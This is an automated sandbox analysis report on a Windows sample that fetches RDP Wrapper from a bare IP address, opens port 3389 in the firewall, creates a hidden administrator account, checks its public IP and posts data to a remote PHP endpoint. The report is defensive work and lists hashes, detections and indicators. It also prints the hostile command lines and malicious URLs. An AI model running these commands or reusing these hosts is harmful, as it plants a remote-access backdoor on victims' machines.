Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1523922
MD5: 6ceb22aeb317c27cf8a0944ec9634d40
SHA1: 235d29feea468488b0f1faa70ac2ce1488ea79d7
SHA256: d2184ec878d89c46f860fa4c37b4d3ebe4803287d894ae8eabf3e1d28ce322da
Tags: exe user-Bitsight
Infos:

Detection

RDPWrap Tool
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a new user with administrator rights
Allows multiple concurrent remote connection
Enables remote desktop connection
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Outbound RDP Connections Over Non-Standard Tools
Sigma detected: RDP Sensitive Settings Changed
Uses netsh to modify the Windows network and firewall settings
Yara detected Costura Assembly Loader
Yara detected RDPWrap Tool
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to enumerate running services
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains executable resources (Code or Archives)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: New User Created Via Net.EXE
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7404 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6CEB22AEB317C27CF8A0944EC9634D40)
    • cmd.exe (PID: 7576 cmdline: "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RDPWInst.exe (PID: 7620 cmdline: C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i MD5: C213162C86BB943BCDF91B3DF381D2F6)
        • netsh.exe (PID: 7760 cmdline: netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
    • cmd.exe (PID: 4092 cmdline: "cmd.exe" /c net user PansyBins WelTW4HnaKt3 /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 4904 cmdline: net user PansyBins WelTW4HnaKt3 /add MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 7284 cmdline: C:\Windows\system32\net1 user PansyBins WelTW4HnaKt3 /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
    • cmd.exe (PID: 5916 cmdline: "cmd.exe" /c net localgroup MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 6344 cmdline: net localgroup MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 6008 cmdline: C:\Windows\system32\net1 localgroup MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
    • cmd.exe (PID: 1916 cmdline: "cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • netsh.exe (PID: 6836 cmdline: netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389 MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
    • cmd.exe (PID: 5528 cmdline: "cmd.exe" /c net localgroup "Administrators" PansyBins /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 1588 cmdline: net localgroup "Administrators" PansyBins /add MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 3264 cmdline: C:\Windows\system32\net1 localgroup "Administrators" PansyBins /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
  • rdpdr.sys (PID: 4 cmdline: MD5: 64991B36F0BD38026F7589572C98E3D6)
  • tsusbhub.sys (PID: 4 cmdline: MD5: CC6D4A26254EB72C93AC848ECFCFB4AF)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
file.exe | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\RDPWInst.exe | JoeSecurity_RDPWrapTool | Yara detected RDPWrap Tool | Joe Security |
C:\Users\user\AppData\Local\Temp\RDPWInst.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

Source | Rule | Description | Author | Strings
00000004.00000000.1400805486.0000000000401000.00000020.00000001.01000000.00000008.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
00000001.00000000.1376199757.00000000006D2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp | JoeSecurity_RDPWrapTool | Yara detected RDPWrap Tool | Joe Security |
00000004.00000000.1400872744.0000000000450000.00000002.00000001.01000000.00000008.sdmp | JoeSecurity_RDPWrapTool | Yara detected RDPWrap Tool | Joe Security |

Source | Rule | Description | Author | Strings
1.0.file.exe.6d0000.0.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
4.2.RDPWInst.exe.400000.0.unpack | JoeSecurity_RDPWrapTool | Yara detected RDPWrap Tool | Joe Security |
4.2.RDPWInst.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
4.0.RDPWInst.exe.400000.0.unpack | JoeSecurity_RDPWrapTool | Yara detected RDPWrap Tool | Joe Security |
4.0.RDPWInst.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

                            System Summary

                            Source: Network ConnectionAuthor: Markus Neis: Data: DestinationIp: 8.46.123.33, DestinationIsIpv6: false, DestinationPort: 3389, EventID: 3, Image: C:\Users\user\Desktop\file.exe, Initiated: true, ProcessId: 7404, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49710
                            Source: Registry Key setAuthor: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali: Data: Details: %ProgramFiles%\RDP Wrapper\rdpwrap.dll, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, ProcessId: 7620, TargetObject: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll
                            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\rdpvideominiport.sys, NewProcessName: C:\Windows\System32\drivers\rdpvideominiport.sys, OriginalFileName: C:\Windows\System32\drivers\rdpvideominiport.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: rdpvideominiport.sys
                            Source: Process startedAuthor: Endgame, JHasenbusch (adapted to Sigma for oscd.community): Data: Command: net user PansyBins WelTW4HnaKt3 /add, CommandLine: net user PansyBins WelTW4HnaKt3 /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user PansyBins WelTW4HnaKt3 /add, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4092, ParentProcessName: cmd.exe, ProcessCommandLine: net user PansyBins WelTW4HnaKt3 /add, ProcessId: 4904, ProcessName: net.exe
                            Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net user PansyBins WelTW4HnaKt3 /add, CommandLine: net user PansyBins WelTW4HnaKt3 /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user PansyBins WelTW4HnaKt3 /add, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4092, ParentProcessName: cmd.exe, ProcessCommandLine: net user PansyBins WelTW4HnaKt3 /add, ProcessId: 4904, ProcessName: net.exe
                            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                            2024-10-02T08:55:38.682625+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49709 | 104.26.13.205 | 80 | TCP

                            AV Detection

                            Source: http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exeVirustotal: Detection: 22%Perma Link
                            Source: https://cloudflare-ipfs.com/ipfs/Qmd3W5DuhgHirLHGVixi6V76LhCkZUz6pnFt5AJBiyvHye/avatar/Virustotal: Detection: 10%Perma Link
                            Source: http://147.45.44.104Virustotal: Detection: 21%Perma Link
                            Source: C:\Program Files\RDP Wrapper\rdpwrap.dllReversingLabs: Detection: 54%
                            Source: C:\Program Files\RDP Wrapper\rdpwrap.dllVirustotal: Detection: 56%Perma Link
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeReversingLabs: Detection: 68%
                            Source: file.exeReversingLabs: Detection: 21%
                            Source: file.exeVirustotal: Detection: 34%Perma Link
                            Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeJoe Sandbox ML: detected
                            Source: file.exeJoe Sandbox ML: detected
                            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP WrapperJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP Wrapper\rdpwrap.iniJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP Wrapper\rdpwrap.dllJump to behavior
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49711 version: TLS 1.2
                            Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: rdpclip.pdbH source: RDPWInst.exe, 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.1.dr
                            Source: Binary string: costura.costura.pdb.compressedlB source: file.exe, 00000001.00000002.1800235734.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: rdpclip.pdbJ source: RDPWInst.exe, 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.1.dr
                            Source: Binary string: costura.costura.pdb.compressed source: file.exe
                            Source: Binary string: RfxVmt.pdb source: file.exe, 00000001.00000002.1800235734.0000000002F67000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, rfxvmt.dll.4.dr, RDPWInst.exe.1.dr
                            Source: Binary string: /_/Source/Bogus/obj/Release/net40/Bogus.pdb source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: rdpclip.pdb source: RDPWInst.exe, 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.1.dr
                            Source: Binary string: RfxVmt.pdbGCTL source: file.exe, 00000001.00000002.1800235734.0000000002F67000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, rfxvmt.dll.4.dr, RDPWInst.exe.1.dr
                            Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: file.exe
                            Source: Binary string: /_/Source/Bogus/obj/Release/net40/Bogus.pdbSHA256v0& source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmp
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_004092D8 FindFirstFileW,FindClose,4_2_004092D8
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_0040F73C FindFirstFileW,FindClose,4_2_0040F73C
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_00408EB9 lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,4_2_00408EB9

                            Networking

                            Source: Yara matchFile source: 4.2.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.0.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000000.1400872744.0000000000450000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: RDPWInst.exe PID: 7620, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, type: DROPPED
                            Source: global trafficTCP traffic: 192.168.2.7:49710 -> 8.46.123.33:3389
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 02 Oct 2024 06:54:58 GMTContent-Type: application/octet-streamContent-Length: 1785344Last-Modified: Thu, 26 Sep 2024 12:36:03 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f55533-1b3e00"X-Content-Type-Options: nosniffAccept-Ranges: bytes
                            Source: global trafficHTTP traffic detected: POST /core/receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: hansgborn.euContent-Length: 185Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1Host: 147.45.44.104Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                            Source: Joe Sandbox ViewIP Address: 8.46.123.33 8.46.123.33
                            Source: Joe Sandbox ViewASN Name: AS-PUBMATICUS AS-PUBMATICUS
                            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: unknownDNS query: name: api.ipify.org
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49709 -> 104.26.13.205:80
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_0043CF60 InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,4_2_0043CF60
                            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                            Source: global trafficDNS traffic detected: DNS query: hansgborn.eu
                            Source: unknownHTTP traffic detected: POST /core/receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: hansgborn.euContent-Length: 185Expect: 100-continueConnection: Keep-Alive
                            Source: file.exe, 00000001.00000002.1800235734.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.1799416851.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104
                            Source: file.exe, 00000001.00000002.1800235734.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe4
                            Source: file.exe, 00000001.00000002.1800235734.0000000003017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.ipify.org
                            Source: file.exe, 00000001.00000002.1800235734.0000000003021000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.1800235734.0000000003017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.ipify.org/
                            Source: file.exe, 00000001.00000002.1800235734.0000000003021000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.1800235734.0000000003017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.ipify.orgd
                            Source: file.exe, 00000001.00000002.1800235734.0000000003027000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hansgborn.eu
                            Source: file.exe, 00000001.00000002.1800235734.0000000003027000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hansgborn.eud
                            Source: file.exe, 00000001.00000002.1800155957.0000000002C80000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: file.exe, 00000001.00000002.1800155957.0000000002C80000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                            Source: file.exe, 00000001.00000002.1800235734.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: file.exe, 00000001.00000002.1800235734.0000000002F67000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://stascorp.co
                            Source: RDPWInst.exe, RDPWInst.exe, 00000004.00000000.1400805486.0000000000401000.00000020.00000001.01000000.00000008.sdmp, RDPWInst.exe.1.dr String found in binary or memory: http://stascorp.com/load/1-1-0-62
                            Source: RDPWInst.exe, 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, rdpwrap.dll.4.dr, RDPWInst.exe.1.dr String found in binary or memory: http://stascorp.comDVarFileInfo$
                            Source: RDPWInst.exe, 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.1.dr String found in binary or memory: http://www.apache.org/licenses/
                            Source: RDPWInst.exe, 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.1.dr String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                            Source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://cloudflare-ipfs.com/ipfs/Qmd3W5DuhgHirLHGVixi6V76LhCkZUz6pnFt5AJBiyvHye/avatar/
                            Source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/bchavez/Bogus
                            Source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/bchavez/Bogus.
                            Source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/bchavez/Bogus/issues/115
                            Source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/bchavez/Bogus/issues/54
                            Source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/bchavez/Bogus/wiki/Bogus-Premium
                            Source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/bchavez/Bogus:
                            Source: file.exe, 00000001.00000002.1800155957.0000000002C80000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/lontivero/Open.Nat/issuesOAlso
                            Source: file.exe, 00000001.00000002.1800235734.0000000003027000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hansgborn.eu
                            Source: file.exe, 00000001.00000002.1800235734.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hansgborn.eu/core/receive.php4
                            Source: file.exe, 00000001.00000002.1800235734.0000000003027000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hansgborn.eu/core/receive.phpd
                            Source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://loremflickr.com
                            Source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://picsum.photos
                            Source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://placeimg.com
                            Source: RDPWInst.exe String found in binary or memory: https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini
                            Source: RDPWInst.exe, 00000004.00000000.1400805486.0000000000401000.00000020.00000001.01000000.00000008.sdmp, RDPWInst.exe.1.dr String found in binary or memory: https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU
                            Source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://via.placeholder.com/
                            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
                            Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
                            Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49711 version: TLS 1.2
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe File created: C:\Windows\System32\rfxvmt.dll
                            Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0118E6B8
                            Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0118DAA0
                            Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0118DDE8
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: 4_2_0040360C
                            Source: Joe Sandbox View Dropped File: C:\Program Files\RDP Wrapper\rdpwrap.dll 798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: String function: 00406BE0 appears 36 times
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: String function: 00404CDC appears 74 times
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: String function: 00407450 appears 135 times
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: String function: 004042F8 appears 74 times
                            Source: RDPWInst.exe.1.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                            Source: RDPWInst.exe.1.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64, for MS Windows
                            Source: RDPWInst.exe.1.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                            Source: RDPWInst.exe.1.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64, for MS Windows
                            Source: RDPWInst.exe.1.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Source: RDPWInst.exe.1.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                            Source: RDPWInst.exe.1.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Source: RDPWInst.exe.1.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (console) x86-64, for MS Windows
                            Source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameBogus.dll, vs file.exe
                            Source: file.exe, 00000001.00000002.1800155957.0000000002C80000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameOpen.Nat.dll2 vs file.exe
                            Source: file.exe, 00000001.00000002.1799102756.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs file.exe
                            Source: file.exe, 00000001.00000002.1800235734.0000000002F67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamerfxvmt.dllj% vs file.exe
                            Source: file.exe Binary or memory string: OriginalFilenameRDPCreator.exe4 vs file.exe
                            Source: unknown Driver loaded: C:\Windows\System32\drivers\rdpvideominiport.sys
                            Source: file.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: classification engine Classification label: mal100.spre.troj.evad.winEXE@30/9@2/5
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: 4_2_0043BF00 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: 4_2_0040FAE8 GetDiskFreeSpaceW
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: 4_2_0043DC64 LoadLibraryExW,FindResourceW,LoadResource,FreeLibrary
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Code function: 4_2_0043B1A8 OpenSCManagerW,GetLastError,OpenServiceW,CloseServiceHandle,GetLastError,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,CloseServiceHandle
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe File created: C:\Program Files\RDP Wrapper
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5416:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
                            Source: C:\Users\user\Desktop\file.exe Mutant created: NULL
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:576:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03
                            Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                            Source: Yara match File source: 4.2.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 4.0.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 00000004.00000000.1400805486.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara match File source: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara match File source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, type: DROPPED
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                            Source: file.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                            Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                            Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT NumberOfCores FROM Win32_Processor
                            Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: file.exe ReversingLabs: Detection: 21%
                            Source: file.exe Virustotal: Detection: 34%
                            Source: RDPWInst.exe String found in binary or memory: Link: http://stascorp.com/load/1-1-0-62
                            Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
